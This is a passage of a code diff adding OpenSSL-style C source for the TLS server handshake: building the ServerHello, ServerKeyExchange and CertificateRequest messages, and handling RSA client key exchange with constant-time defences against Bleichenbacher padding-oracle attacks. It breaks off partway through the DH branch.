+    if (!SSL_USE_SIGALGS(s) || !(s->verify_mode & SSL_VERIFY_PEER)) {
+        if (!ssl3_digest_cached_records(s))
+            goto f_err;
+    }
+
+    /*-
+    * we now have the following setup.
+     * client_random
+     * cipher_list          - our prefered list of ciphers
+     * ciphers              - the clients prefered list of ciphers
+     * compression          - basically ignored right now
+     * ssl version is set   - sslv3
+     * s->session           - The ssl session has been setup.
+     * s->hit               - session reuse flag
+     * s->tmp.new_cipher    - the new cipher to use.
+     */
+
+    /* Handles TLS extensions that we couldn't check earlier */
+    if (s->version >= SSL3_VERSION) {
+        if (ssl_check_clienthello_tlsext_late(s) <= 0) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
+            goto err;
+        }
+    }
+
+    if (ret < 0)
+        ret = -ret;
+    if (0) {
+ f_err:
+        ssl3_send_alert(s, SSL3_AL_FATAL, al);
+    }
+ err:
+    if (ciphers != NULL)
+        sk_SSL_CIPHER_free(ciphers);
+    return ret < 0 ? -1 : ret;
+}
+
+int ssl3_send_server_hello(SSL *s)
+{
+    unsigned char *buf;
+    unsigned char *p, *d;
+    int i, sl;
+    int al = 0;
+    unsigned long l;
+
+    if (s->state == SSL3_ST_SW_SRVR_HELLO_A) {
+        buf = (unsigned char *)s->init_buf->data;
+#ifdef OPENSSL_NO_TLSEXT
+        p = s->s3->server_random;
+        if (ssl_fill_hello_random(s, 1, p, SSL3_RANDOM_SIZE) <= 0)
+            return -1;
+#endif
+        /* Do the message type and length last */
+        d = p = ssl_handshake_start(s);
+
+        *(p++) = s->version >> 8;
+        *(p++) = s->version & 0xff;
+
+        /* Random stuff */
+        memcpy(p, s->s3->server_random, SSL3_RANDOM_SIZE);
+        p += SSL3_RANDOM_SIZE;
+
+        /*-
+         * There are several cases for the session ID to send
+         * back in the server hello:
+         * - For session reuse from the session cache,
+         *   we send back the old session ID.
+         * - If stateless session reuse (using a session ticket)
+         *   is successful, we send back the client's "session ID"
+         *   (which doesn't actually identify the session).
+         * - If it is a new session, we send back the new
+         *   session ID.
+         * - However, if we want the new session to be single-use,
+         *   we send back a 0-length session ID.
+         * s->hit is non-zero in either case of session reuse,
+         * so the following won't overwrite an ID that we're supposed
+         * to send back.
+         */
+        if (!(s->ctx->session_cache_mode & SSL_SESS_CACHE_SERVER)
+            && !s->hit)
+            s->session->session_id_length = 0;
+
+        sl = s->session->session_id_length;
+        if (sl > (int)sizeof(s->session->session_id)) {
+            SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO, ERR_R_INTERNAL_ERROR);
+            return -1;
+        }
+        *(p++) = sl;
+        memcpy(p, s->session->session_id, sl);
+        p += sl;
+
+        /* put the cipher */
+        i = ssl3_put_cipher_by_char(s->s3->tmp.new_cipher, p);
+        p += i;
+
+        /* put the compression method */
+#ifdef OPENSSL_NO_COMP
+        *(p++) = 0;
+#else
+        if (s->s3->tmp.new_compression == NULL)
+            *(p++) = 0;
+        else
+            *(p++) = s->s3->tmp.new_compression->id;
+#endif
+#ifndef OPENSSL_NO_TLSEXT
+        if (ssl_prepare_serverhello_tlsext(s) <= 0) {
+            SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO, SSL_R_SERVERHELLO_TLSEXT);
+            return -1;
+        }
+        if ((p =
+             ssl_add_serverhello_tlsext(s, p, buf + SSL3_RT_MAX_PLAIN_LENGTH,
+                                        &al)) == NULL) {
+            ssl3_send_alert(s, SSL3_AL_FATAL, al);
+            SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO, ERR_R_INTERNAL_ERROR);
+            return -1;
+        }
+#endif
+        /* do the header */
+        l = (p - d);
+        ssl_set_handshake_header(s, SSL3_MT_SERVER_HELLO, l);
+        s->state = SSL3_ST_SW_SRVR_HELLO_B;
+    }
+
+    /* SSL3_ST_SW_SRVR_HELLO_B */
+    return ssl_do_write(s);
+}
+
+int ssl3_send_server_done(SSL *s)
+{
+
+    if (s->state == SSL3_ST_SW_SRVR_DONE_A) {
+        ssl_set_handshake_header(s, SSL3_MT_SERVER_DONE, 0);
+        s->state = SSL3_ST_SW_SRVR_DONE_B;
+    }
+
+    /* SSL3_ST_SW_SRVR_DONE_B */
+    return ssl_do_write(s);
+}
+
+int ssl3_send_server_key_exchange(SSL *s)
+{
+#ifndef OPENSSL_NO_RSA
+    unsigned char *q;
+    int j, num;
+    RSA *rsa;
+    unsigned char md_buf[MD5_DIGEST_LENGTH + SHA_DIGEST_LENGTH];
+    unsigned int u;
+#endif
+#ifndef OPENSSL_NO_DH
+    DH *dh = NULL, *dhp;
+#endif
+#ifndef OPENSSL_NO_ECDH
+    EC_KEY *ecdh = NULL, *ecdhp;
+    unsigned char *encodedPoint = NULL;
+    int encodedlen = 0;
+    int curve_id = 0;
+    BN_CTX *bn_ctx = NULL;
+#endif
+    EVP_PKEY *pkey;
+    const EVP_MD *md = NULL;
+    unsigned char *p, *d;
+    int al, i;
+    unsigned long type;
+    int n;
+    CERT *cert;
+    BIGNUM *r[4];
+    int nr[4], kn;
+    BUF_MEM *buf;
+    EVP_MD_CTX md_ctx;
+
+    EVP_MD_CTX_init(&md_ctx);
+    if (s->state == SSL3_ST_SW_KEY_EXCH_A) {
+        type = s->s3->tmp.new_cipher->algorithm_mkey;
+        cert = s->cert;
+
+        buf = s->init_buf;
+
+        r[0] = r[1] = r[2] = r[3] = NULL;
+        n = 0;
+#ifndef OPENSSL_NO_RSA
+        if (type & SSL_kRSA) {
+            rsa = cert->rsa_tmp;
+            if ((rsa == NULL) && (s->cert->rsa_tmp_cb != NULL)) {
+                rsa = s->cert->rsa_tmp_cb(s,
+                                          SSL_C_IS_EXPORT(s->s3->
+                                                          tmp.new_cipher),
+                                          SSL_C_EXPORT_PKEYLENGTH(s->s3->
+                                                                  tmp.new_cipher));
+                if (rsa == NULL) {
+                    al = SSL_AD_HANDSHAKE_FAILURE;
+                    SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                           SSL_R_ERROR_GENERATING_TMP_RSA_KEY);
+                    goto f_err;
+                }
+                RSA_up_ref(rsa);
+                cert->rsa_tmp = rsa;
+            }
+            if (rsa == NULL) {
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                       SSL_R_MISSING_TMP_RSA_KEY);
+                goto f_err;
+            }
+            r[0] = rsa->n;
+            r[1] = rsa->e;
+            s->s3->tmp.use_rsa_tmp = 1;
+        } else
+#endif
+#ifndef OPENSSL_NO_DH
+        if (type & SSL_kEDH) {
+            dhp = cert->dh_tmp;
+            if ((dhp == NULL) && (s->cert->dh_tmp_cb != NULL))
+                dhp = s->cert->dh_tmp_cb(s,
+                                         SSL_C_IS_EXPORT(s->s3->
+                                                         tmp.new_cipher),
+                                         SSL_C_EXPORT_PKEYLENGTH(s->s3->
+                                                                 tmp.new_cipher));
+            if (dhp == NULL) {
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                       SSL_R_MISSING_TMP_DH_KEY);
+                goto f_err;
+            }
+
+            if (s->s3->tmp.dh != NULL) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                       ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+
+            if ((dh = DHparams_dup(dhp)) == NULL) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_DH_LIB);
+                goto err;
+            }
+
+            s->s3->tmp.dh = dh;
+            if ((dhp->pub_key == NULL ||
+                 dhp->priv_key == NULL ||
+                 (s->options & SSL_OP_SINGLE_DH_USE))) {
+                if (!DH_generate_key(dh)) {
+                    SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_DH_LIB);
+                    goto err;
+                }
+            } else {
+                dh->pub_key = BN_dup(dhp->pub_key);
+                dh->priv_key = BN_dup(dhp->priv_key);
+                if ((dh->pub_key == NULL) || (dh->priv_key == NULL)) {
+                    SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_DH_LIB);
+                    goto err;
+                }
+            }
+            r[0] = dh->p;
+            r[1] = dh->g;
+            r[2] = dh->pub_key;
+        } else
+#endif
+#ifndef OPENSSL_NO_ECDH
+        if (type & SSL_kEECDH) {
+            const EC_GROUP *group;
+
+            ecdhp = cert->ecdh_tmp;
+            if (s->cert->ecdh_tmp_auto) {
+                /* Get NID of appropriate shared curve */
+                int nid = tls1_shared_curve(s, -2);
+                if (nid != NID_undef)
+                    ecdhp = EC_KEY_new_by_curve_name(nid);
+            } else if ((ecdhp == NULL) && s->cert->ecdh_tmp_cb) {
+                ecdhp = s->cert->ecdh_tmp_cb(s,
+                                             SSL_C_IS_EXPORT(s->s3->
+                                                             tmp.new_cipher),
+                                             SSL_C_EXPORT_PKEYLENGTH(s->
+                                                                     s3->tmp.new_cipher));
+            }
+            if (ecdhp == NULL) {
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                       SSL_R_MISSING_TMP_ECDH_KEY);
+                goto f_err;
+            }
+
+            if (s->s3->tmp.ecdh != NULL) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                       ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+
+            /* Duplicate the ECDH structure. */
+            if (ecdhp == NULL) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_ECDH_LIB);
+                goto err;
+            }
+            if (s->cert->ecdh_tmp_auto)
+                ecdh = ecdhp;
+            else if ((ecdh = EC_KEY_dup(ecdhp)) == NULL) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_ECDH_LIB);
+                goto err;
+            }
+
+            s->s3->tmp.ecdh = ecdh;
+            if ((EC_KEY_get0_public_key(ecdh) == NULL) ||
+                (EC_KEY_get0_private_key(ecdh) == NULL) ||
+                (s->options & SSL_OP_SINGLE_ECDH_USE)) {
+                if (!EC_KEY_generate_key(ecdh)) {
+                    SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                           ERR_R_ECDH_LIB);
+                    goto err;
+                }
+            }
+
+            if (((group = EC_KEY_get0_group(ecdh)) == NULL) ||
+                (EC_KEY_get0_public_key(ecdh) == NULL) ||
+                (EC_KEY_get0_private_key(ecdh) == NULL)) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_ECDH_LIB);
+                goto err;
+            }
+
+            if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) &&
+                (EC_GROUP_get_degree(group) > 163)) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                       SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER);
+                goto err;
+            }
+
+            /*
+             * XXX: For now, we only support ephemeral ECDH keys over named
+             * (not generic) curves. For supported named curves, curve_id is
+             * non-zero.
+             */
+            if ((curve_id =
+                 tls1_ec_nid2curve_id(EC_GROUP_get_curve_name(group)))
+                == 0) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                       SSL_R_UNSUPPORTED_ELLIPTIC_CURVE);
+                goto err;
+            }
+
+            /*
+             * Encode the public key. First check the size of encoding and
+             * allocate memory accordingly.
+             */
+            encodedlen = EC_POINT_point2oct(group,
+                                            EC_KEY_get0_public_key(ecdh),
+                                            POINT_CONVERSION_UNCOMPRESSED,
+                                            NULL, 0, NULL);
+
+            encodedPoint = (unsigned char *)
+                OPENSSL_malloc(encodedlen * sizeof(unsigned char));
+            bn_ctx = BN_CTX_new();
+            if ((encodedPoint == NULL) || (bn_ctx == NULL)) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                       ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+
+            encodedlen = EC_POINT_point2oct(group,
+                                            EC_KEY_get0_public_key(ecdh),
+                                            POINT_CONVERSION_UNCOMPRESSED,
+                                            encodedPoint, encodedlen, bn_ctx);
+
+            if (encodedlen == 0) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_ECDH_LIB);
+                goto err;
+            }
+
+            BN_CTX_free(bn_ctx);
+            bn_ctx = NULL;
+
+            /*
+             * XXX: For now, we only support named (not generic) curves in
+             * ECDH ephemeral key exchanges. In this situation, we need four
+             * additional bytes to encode the entire ServerECDHParams
+             * structure.
+             */
+            n = 4 + encodedlen;
+
+            /*
+             * We'll generate the serverKeyExchange message explicitly so we
+             * can set these to NULLs
+             */
+            r[0] = NULL;
+            r[1] = NULL;
+            r[2] = NULL;
+            r[3] = NULL;
+        } else
+#endif                          /* !OPENSSL_NO_ECDH */
+#ifndef OPENSSL_NO_PSK
+        if (type & SSL_kPSK) {
+            /*
+             * reserve size for record length and PSK identity hint
+             */
+            n += 2 + strlen(s->ctx->psk_identity_hint);
+        } else
+#endif                          /* !OPENSSL_NO_PSK */
+#ifndef OPENSSL_NO_SRP
+        if (type & SSL_kSRP) {
+            if ((s->srp_ctx.N == NULL) ||
+                (s->srp_ctx.g == NULL) ||
+                (s->srp_ctx.s == NULL) || (s->srp_ctx.B == NULL)) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                       SSL_R_MISSING_SRP_PARAM);
+                goto err;
+            }
+            r[0] = s->srp_ctx.N;
+            r[1] = s->srp_ctx.g;
+            r[2] = s->srp_ctx.s;
+            r[3] = s->srp_ctx.B;
+        } else
+#endif
+        {
+            al = SSL_AD_HANDSHAKE_FAILURE;
+            SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                   SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE);
+            goto f_err;
+        }
+        for (i = 0; i < 4 && r[i] != NULL; i++) {
+            nr[i] = BN_num_bytes(r[i]);
+#ifndef OPENSSL_NO_SRP
+            if ((i == 2) && (type & SSL_kSRP))
+                n += 1 + nr[i];
+            else
+#endif
+                n += 2 + nr[i];
+        }
+
+        if (!(s->s3->tmp.new_cipher->algorithm_auth & (SSL_aNULL | SSL_aSRP))
+            && !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK)) {
+            if ((pkey = ssl_get_sign_pkey(s, s->s3->tmp.new_cipher, &md))
+                == NULL) {
+                al = SSL_AD_DECODE_ERROR;
+                goto f_err;
+            }
+            kn = EVP_PKEY_size(pkey);
+        } else {
+            pkey = NULL;
+            kn = 0;
+        }
+
+        if (!BUF_MEM_grow_clean(buf, n + SSL_HM_HEADER_LENGTH(s) + kn)) {
+            SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_LIB_BUF);
+            goto err;
+        }
+        d = p = ssl_handshake_start(s);
+
+        for (i = 0; i < 4 && r[i] != NULL; i++) {
+#ifndef OPENSSL_NO_SRP
+            if ((i == 2) && (type & SSL_kSRP)) {
+                *p = nr[i];
+                p++;
+            } else
+#endif
+                s2n(nr[i], p);
+            BN_bn2bin(r[i], p);
+            p += nr[i];
+        }
+
+#ifndef OPENSSL_NO_ECDH
+        if (type & SSL_kEECDH) {
+            /*
+             * XXX: For now, we only support named (not generic) curves. In
+             * this situation, the serverKeyExchange message has: [1 byte
+             * CurveType], [2 byte CurveName] [1 byte length of encoded
+             * point], followed by the actual encoded point itself
+             */
+            *p = NAMED_CURVE_TYPE;
+            p += 1;
+            *p = 0;
+            p += 1;
+            *p = curve_id;
+            p += 1;
+            *p = encodedlen;
+            p += 1;
+            memcpy((unsigned char *)p,
+                   (unsigned char *)encodedPoint, encodedlen);
+            OPENSSL_free(encodedPoint);
+            encodedPoint = NULL;
+            p += encodedlen;
+        }
+#endif
+
+#ifndef OPENSSL_NO_PSK
+        if (type & SSL_kPSK) {
+            /* copy PSK identity hint */
+            s2n(strlen(s->ctx->psk_identity_hint), p);
+            strncpy((char *)p, s->ctx->psk_identity_hint,
+                    strlen(s->ctx->psk_identity_hint));
+            p += strlen(s->ctx->psk_identity_hint);
+        }
+#endif
+
+        /* not anonymous */
+        if (pkey != NULL) {
+            /*
+             * n is the length of the params, they start at &(d[4]) and p
+             * points to the space at the end.
+             */
+#ifndef OPENSSL_NO_RSA
+            if (pkey->type == EVP_PKEY_RSA && !SSL_USE_SIGALGS(s)) {
+                q = md_buf;
+                j = 0;
+                for (num = 2; num > 0; num--) {
+                    EVP_MD_CTX_set_flags(&md_ctx,
+                                         EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
+                    EVP_DigestInit_ex(&md_ctx, (num == 2)
+                                      ? s->ctx->md5 : s->ctx->sha1, NULL);
+                    EVP_DigestUpdate(&md_ctx, &(s->s3->client_random[0]),
+                                     SSL3_RANDOM_SIZE);
+                    EVP_DigestUpdate(&md_ctx, &(s->s3->server_random[0]),
+                                     SSL3_RANDOM_SIZE);
+                    EVP_DigestUpdate(&md_ctx, d, n);
+                    EVP_DigestFinal_ex(&md_ctx, q, (unsigned int *)&i);
+                    q += i;
+                    j += i;
+                }
+                if (RSA_sign(NID_md5_sha1, md_buf, j,
+                             &(p[2]), &u, pkey->pkey.rsa) <= 0) {
+                    SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_LIB_RSA);
+                    goto err;
+                }
+                s2n(u, p);
+                n += u + 2;
+            } else
+#endif
+            if (md) {
+                /* send signature algorithm */
+                if (SSL_USE_SIGALGS(s)) {
+                    if (!tls12_get_sigandhash(p, pkey, md)) {
+                        /* Should never happen */
+                        al = SSL_AD_INTERNAL_ERROR;
+                        SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                               ERR_R_INTERNAL_ERROR);
+                        goto f_err;
+                    }
+                    p += 2;
+                }
+#ifdef SSL_DEBUG
+                fprintf(stderr, "Using hash %s\n", EVP_MD_name(md));
+#endif
+                EVP_SignInit_ex(&md_ctx, md, NULL);
+                EVP_SignUpdate(&md_ctx, &(s->s3->client_random[0]),
+                               SSL3_RANDOM_SIZE);
+                EVP_SignUpdate(&md_ctx, &(s->s3->server_random[0]),
+                               SSL3_RANDOM_SIZE);
+                EVP_SignUpdate(&md_ctx, d, n);
+                if (!EVP_SignFinal(&md_ctx, &(p[2]),
+                                   (unsigned int *)&i, pkey)) {
+                    SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_LIB_EVP);
+                    goto err;
+                }
+                s2n(i, p);
+                n += i + 2;
+                if (SSL_USE_SIGALGS(s))
+                    n += 2;
+            } else {
+                /* Is this error check actually needed? */
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
+                       SSL_R_UNKNOWN_PKEY_TYPE);
+                goto f_err;
+            }
+        }
+
+        ssl_set_handshake_header(s, SSL3_MT_SERVER_KEY_EXCHANGE, n);
+    }
+
+    s->state = SSL3_ST_SW_KEY_EXCH_B;
+    EVP_MD_CTX_cleanup(&md_ctx);
+    return ssl_do_write(s);
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+ err:
+#ifndef OPENSSL_NO_ECDH
+    if (encodedPoint != NULL)
+        OPENSSL_free(encodedPoint);
+    BN_CTX_free(bn_ctx);
+#endif
+    EVP_MD_CTX_cleanup(&md_ctx);
+    return (-1);
+}
+
+int ssl3_send_certificate_request(SSL *s)
+{
+    unsigned char *p, *d;
+    int i, j, nl, off, n;
+    STACK_OF(X509_NAME) *sk = NULL;
+    X509_NAME *name;
+    BUF_MEM *buf;
+
+    if (s->state == SSL3_ST_SW_CERT_REQ_A) {
+        buf = s->init_buf;
+
+        d = p = ssl_handshake_start(s);
+
+        /* get the list of acceptable cert types */
+        p++;
+        n = ssl3_get_req_cert_type(s, p);
+        d[0] = n;
+        p += n;
+        n++;
+
+        if (SSL_USE_SIGALGS(s)) {
+            const unsigned char *psigs;
+            nl = tls12_get_psigalgs(s, &psigs);
+            s2n(nl, p);
+            memcpy(p, psigs, nl);
+            p += nl;
+            n += nl + 2;
+        }
+
+        off = n;
+        p += 2;
+        n += 2;
+
+        sk = SSL_get_client_CA_list(s);
+        nl = 0;
+        if (sk != NULL) {
+            for (i = 0; i < sk_X509_NAME_num(sk); i++) {
+                name = sk_X509_NAME_value(sk, i);
+                j = i2d_X509_NAME(name, NULL);
+                if (!BUF_MEM_grow_clean
+                    (buf, SSL_HM_HEADER_LENGTH(s) + n + j + 2)) {
+                    SSLerr(SSL_F_SSL3_SEND_CERTIFICATE_REQUEST,
+                           ERR_R_BUF_LIB);
+                    goto err;
+                }
+                p = ssl_handshake_start(s) + n;
+                if (!(s->options & SSL_OP_NETSCAPE_CA_DN_BUG)) {
+                    s2n(j, p);
+                    i2d_X509_NAME(name, &p);
+                    n += 2 + j;
+                    nl += 2 + j;
+                } else {
+                    d = p;
+                    i2d_X509_NAME(name, &p);
+                    j -= 2;
+                    s2n(j, d);
+                    j += 2;
+                    n += j;
+                    nl += j;
+                }
+            }
+        }
+        /* else no CA names */
+        p = ssl_handshake_start(s) + off;
+        s2n(nl, p);
+
+        ssl_set_handshake_header(s, SSL3_MT_CERTIFICATE_REQUEST, n);
+
+#ifdef NETSCAPE_HANG_BUG
+        if (!SSL_IS_DTLS(s)) {
+            if (!BUF_MEM_grow_clean(buf, s->init_num + 4)) {
+                SSLerr(SSL_F_SSL3_SEND_CERTIFICATE_REQUEST, ERR_R_BUF_LIB);
+                goto err;
+            }
+            p = (unsigned char *)s->init_buf->data + s->init_num;
+            /* do the header */
+            *(p++) = SSL3_MT_SERVER_DONE;
+            *(p++) = 0;
+            *(p++) = 0;
+            *(p++) = 0;
+            s->init_num += 4;
+        }
+#endif
+
+        s->state = SSL3_ST_SW_CERT_REQ_B;
+    }
+
+    /* SSL3_ST_SW_CERT_REQ_B */
+    return ssl_do_write(s);
+ err:
+    return (-1);
+}
+
+int ssl3_get_client_key_exchange(SSL *s)
+{
+    int i, al, ok;
+    long n;
+    unsigned long alg_k;
+    unsigned char *p;
+#ifndef OPENSSL_NO_RSA
+    RSA *rsa = NULL;
+    EVP_PKEY *pkey = NULL;
+#endif
+#ifndef OPENSSL_NO_DH
+    BIGNUM *pub = NULL;
+    DH *dh_srvr, *dh_clnt = NULL;
+#endif
+#ifndef OPENSSL_NO_KRB5
+    KSSL_ERR kssl_err;
+#endif                          /* OPENSSL_NO_KRB5 */
+
+#ifndef OPENSSL_NO_ECDH
+    EC_KEY *srvr_ecdh = NULL;
+    EVP_PKEY *clnt_pub_pkey = NULL;
+    EC_POINT *clnt_ecpoint = NULL;
+    BN_CTX *bn_ctx = NULL;
+#endif
+
+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_SR_KEY_EXCH_A,
+                                   SSL3_ST_SR_KEY_EXCH_B,
+                                   SSL3_MT_CLIENT_KEY_EXCHANGE, 2048, &ok);
+
+    if (!ok)
+        return ((int)n);
+    p = (unsigned char *)s->init_msg;
+
+    alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
+
+#ifndef OPENSSL_NO_RSA
+    if (alg_k & SSL_kRSA) {
+        unsigned char rand_premaster_secret[SSL_MAX_MASTER_KEY_LENGTH];
+        int decrypt_len;
+        unsigned char decrypt_good, version_good;
+        size_t j;
+
+        /* FIX THIS UP EAY EAY EAY EAY */
+        if (s->s3->tmp.use_rsa_tmp) {
+            if ((s->cert != NULL) && (s->cert->rsa_tmp != NULL))
+                rsa = s->cert->rsa_tmp;
+            /*
+             * Don't do a callback because rsa_tmp should be sent already
+             */
+            if (rsa == NULL) {
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                       SSL_R_MISSING_TMP_RSA_PKEY);
+                goto f_err;
+
+            }
+        } else {
+            pkey = s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey;
+            if ((pkey == NULL) ||
+                (pkey->type != EVP_PKEY_RSA) || (pkey->pkey.rsa == NULL)) {
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                       SSL_R_MISSING_RSA_CERTIFICATE);
+                goto f_err;
+            }
+            rsa = pkey->pkey.rsa;
+        }
+
+        /* TLS and [incidentally] DTLS{0xFEFF} */
+        if (s->version > SSL3_VERSION && s->version != DTLS1_BAD_VER) {
+            n2s(p, i);
+            if (n != i + 2) {
+                if (!(s->options & SSL_OP_TLS_D5_BUG)) {
+                    al = SSL_AD_DECODE_ERROR;
+                    SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                           SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG);
+                    goto f_err;
+                } else
+                    p -= 2;
+            } else
+                n = i;
+        }
+
+        /*
+         * Reject overly short RSA ciphertext because we want to be sure
+         * that the buffer size makes it safe to iterate over the entire
+         * size of a premaster secret (SSL_MAX_MASTER_KEY_LENGTH). The
+         * actual expected size is larger due to RSA padding, but the
+         * bound is sufficient to be safe.
+         */
+        if (n < SSL_MAX_MASTER_KEY_LENGTH) {
+            al = SSL_AD_DECRYPT_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_TLS_RSA_ENCRYPTED_VALUE_LENGTH_IS_WRONG);
+            goto f_err;
+        }
+
+        /*
+         * We must not leak whether a decryption failure occurs because of
+         * Bleichenbacher's attack on PKCS #1 v1.5 RSA padding (see RFC 2246,
+         * section 7.4.7.1). The code follows that advice of the TLS RFC and
+         * generates a random premaster secret for the case that the decrypt
+         * fails. See https://tools.ietf.org/html/rfc5246#section-7.4.7.1
+         */
+
+        /*
+         * should be RAND_bytes, but we cannot work around a failure.
+         */
+        if (RAND_pseudo_bytes(rand_premaster_secret,
+                              sizeof(rand_premaster_secret)) <= 0)
+            goto err;
+        decrypt_len =
+            RSA_private_decrypt((int)n, p, p, rsa, RSA_PKCS1_PADDING);
+        ERR_clear_error();
+
+        /*
+         * decrypt_len should be SSL_MAX_MASTER_KEY_LENGTH. decrypt_good will
+         * be 0xff if so and zero otherwise.
+         */
+        decrypt_good =
+            constant_time_eq_int_8(decrypt_len, SSL_MAX_MASTER_KEY_LENGTH);
+
+        /*
+         * If the version in the decrypted pre-master secret is correct then
+         * version_good will be 0xff, otherwise it'll be zero. The
+         * Klima-Pokorny-Rosa extension of Bleichenbacher's attack
+         * (http://eprint.iacr.org/2003/052/) exploits the version number
+         * check as a "bad version oracle". Thus version checks are done in
+         * constant time and are treated like any other decryption error.
+         */
+        version_good =
+            constant_time_eq_8(p[0], (unsigned)(s->client_version >> 8));
+        version_good &=
+            constant_time_eq_8(p[1], (unsigned)(s->client_version & 0xff));
+
+        /*
+         * The premaster secret must contain the same version number as the
+         * ClientHello to detect version rollback attacks (strangely, the
+         * protocol does not offer such protection for DH ciphersuites).
+         * However, buggy clients exist that send the negotiated protocol
+         * version instead if the server does not support the requested
+         * protocol version. If SSL_OP_TLS_ROLLBACK_BUG is set, tolerate such
+         * clients.
+         */
+        if (s->options & SSL_OP_TLS_ROLLBACK_BUG) {
+            unsigned char workaround_good;
+            workaround_good =
+                constant_time_eq_8(p[0], (unsigned)(s->version >> 8));
+            workaround_good &=
+                constant_time_eq_8(p[1], (unsigned)(s->version & 0xff));
+            version_good |= workaround_good;
+        }
+
+        /*
+         * Both decryption and version must be good for decrypt_good to
+         * remain non-zero (0xff).
+         */
+        decrypt_good &= version_good;
+
+        /*
+         * Now copy rand_premaster_secret over from p using
+         * decrypt_good_mask. If decryption failed, then p does not
+         * contain valid plaintext, however, a check above guarantees
+         * it is still sufficiently large to read from.
+         */
+        for (j = 0; j < sizeof(rand_premaster_secret); j++) {
+            p[j] = constant_time_select_8(decrypt_good, p[j],
+                                          rand_premaster_secret[j]);
+        }
+
+        s->session->master_key_length =
+            s->method->ssl3_enc->generate_master_secret(s,
+                                                        s->
+                                                        session->master_key,
+                                                        p,
+                                                        sizeof
+                                                        (rand_premaster_secret));
+        OPENSSL_cleanse(p, sizeof(rand_premaster_secret));
+    } else
+#endif
+#ifndef OPENSSL_NO_DH
+    if (alg_k & (SSL_kEDH | SSL_kDHr | SSL_kDHd)) {
+        int idx = -1;
+        EVP_PKEY *skey = NULL;
+        if (n)
+            n2s(p, i);
+        else
+            i = 0;
+        if (n && n != i + 2) {
+            if (!(s->options & SSL_OP_SSLEAY_080_CLIENT_DH_BUG)) {
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                       SSL_R_DH_PUBLIC_VALUE_LENGTH_IS_WRONG);
+                goto err;
+            } else {
+                p -= 2;
+                i = (int)n;
+            }
+        }
+        if (alg_k & SSL_kDHr)
+            idx = SSL_PKEY_DH_RSA;
+        else if (alg_k & SSL_kDHd)
+            idx = SSL_PKEY_DH_DSA;
+        if (idx >= 0) {
+            skey = s->cert->pkeys[idx].privatekey;
+            if ((skey == NULL) ||
+                (skey->type != EVP_PKEY_DH) || (skey->pkey.dh == NULL)) {
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                       SSL_R_MISSING_RSA_CERTIFICATE);
+                goto f_err;
+            }
+            dh_srvr = skey->pkey.dh;
+        } else if (s->s3->tmp.dh == NULL) {
+            al = SSL_AD_HANDSHAKE_FAILURE;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_MISSING_TMP_DH_KEY);
+            goto f_err;
+        } else
